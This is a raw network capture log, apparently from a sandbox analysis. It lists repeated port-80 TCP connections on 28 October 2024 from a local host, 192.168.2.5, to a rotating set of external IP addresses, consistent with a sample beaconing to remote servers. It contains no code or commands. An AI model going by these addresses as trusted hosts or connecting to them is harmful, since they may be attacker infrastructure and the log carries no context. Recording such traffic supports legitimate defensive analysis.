                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.653712988 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.659876108 CET804993013.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.662187099 CET4993080192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.901134968 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907051086 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907183886 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907524109 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.907537937 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.913147926 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.913567066 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.573523045 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.573682070 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.579859972 CET804994144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.579904079 CET4994180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.817002058 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822444916 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822643042 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822643995 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.822664022 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.828026056 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.828378916 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.250859976 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.254626036 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.261055946 CET804994718.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.262475967 CET4994780192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.577675104 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585434914 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585516930 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585644007 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.585679054 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.594429016 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.596414089 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261387110 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261446953 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.261475086 CET4995880192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.267091990 CET8049958172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.295913935 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301700115 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301812887 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.301923990 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.302012920 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.307583094 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.307919025 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966682911 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966742992 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.966779947 CET4996080192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.972404003 CET8049960172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.199840069 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.205981970 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206052065 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206497908 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.206515074 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.211904049 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.212007999 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.183917046 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.184058905 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.190176964 CET804996634.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.190756083 CET4996680192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.444209099 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454504013 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454588890 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454699993 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.454727888 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.460031033 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.462235928 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.157196045 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.159600019 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.166217089 CET804997518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.168240070 CET4997580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.407610893 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.413237095 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.413324118 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.413630962 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.416934967 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.419830084 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.422518015 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.053874969 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.100056887 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.114195108 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.114228010 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.119899035 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.120564938 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.261414051 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.303181887 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.517707109 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524059057 CET804998813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524125099 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524434090 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524463892 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.531145096 CET804998813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.531297922 CET804998813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:54.967310905 CET804998813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.021984100 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.236541033 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.242669106 CET804998813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.242739916 CET4998880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.579216003 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584670067 CET804999944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584757090 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584899902 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584944963 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.590202093 CET804999944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.590523005 CET804999944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.242321968 CET804999944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.242496014 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.248431921 CET804999944.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.248485088 CET4999980192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.585720062 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591531992 CET805000154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591603041 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591741085 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591767073 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.597045898 CET805000154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.597237110 CET805000154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.420901060 CET805000154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.422483921 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.429373980 CET805000154.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.429524899 CET5000180192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.629160881 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.634867907 CET805000235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.634943962 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.635310888 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.635310888 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.640737057 CET805000235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.641072035 CET805000235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.464307070 CET805000235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.464459896 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.470917940 CET805000235.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.470977068 CET5000280192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.650193930 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655752897 CET80500033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655831099 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655952930 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655973911 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.661371946 CET80500033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.662031889 CET80500033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.331190109 CET80500033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.331358910 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.362253904 CET80500033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.362346888 CET5000380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.540299892 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.545811892 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.545896053 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546041965 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546065092 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.551646948 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.551661015 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.382225990 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.428179026 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437275887 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437294960 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.448057890 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.448488951 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.682236910 CET8050004165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.725114107 CET5000480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.968503952 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974374056 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974488020 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974608898 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974636078 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.980513096 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.980612040 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.809478998 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.809628010 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.815592051 CET805000554.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.815653086 CET5000580192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995723009 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.995769978 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.001490116 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.001935959 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.143939018 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.193809986 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414597988 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.414647102 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.420641899 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.420984983 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.560302973 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.615686893 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.850526094 CET8049982208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.854074001 CET4998280192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.263294935 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.268903971 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271256924 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.276854992 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.277031898 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.090595961 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.090764999 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.096494913 CET805000634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.096559048 CET5000680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.372339964 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378273010 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378372908 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378541946 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378563881 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.384584904 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.384603024 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.209378004 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.209666014 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.215711117 CET805000754.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.215771914 CET5000780192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.412173986 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.417829990 CET805000818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.417917013 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.418046951 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.418077946 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.423675060 CET805000818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.423703909 CET805000818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:06.862579107 CET805000818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:06.865269899 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:06.871841908 CET805000818.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:06.871906042 CET5000880192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.204108000 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.209656954 CET805000918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.209736109 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.212038994 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.212064028 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.220459938 CET805000918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.220506907 CET805000918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.875771999 CET805000918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.875926971 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.881954908 CET805000918.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.882020950 CET5000980192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.490485907 CET5001080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496232986 CET805001044.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496329069 CET5001080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496460915 CET5001080192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496480942 CET5001080192.168.2.544.221.84.105
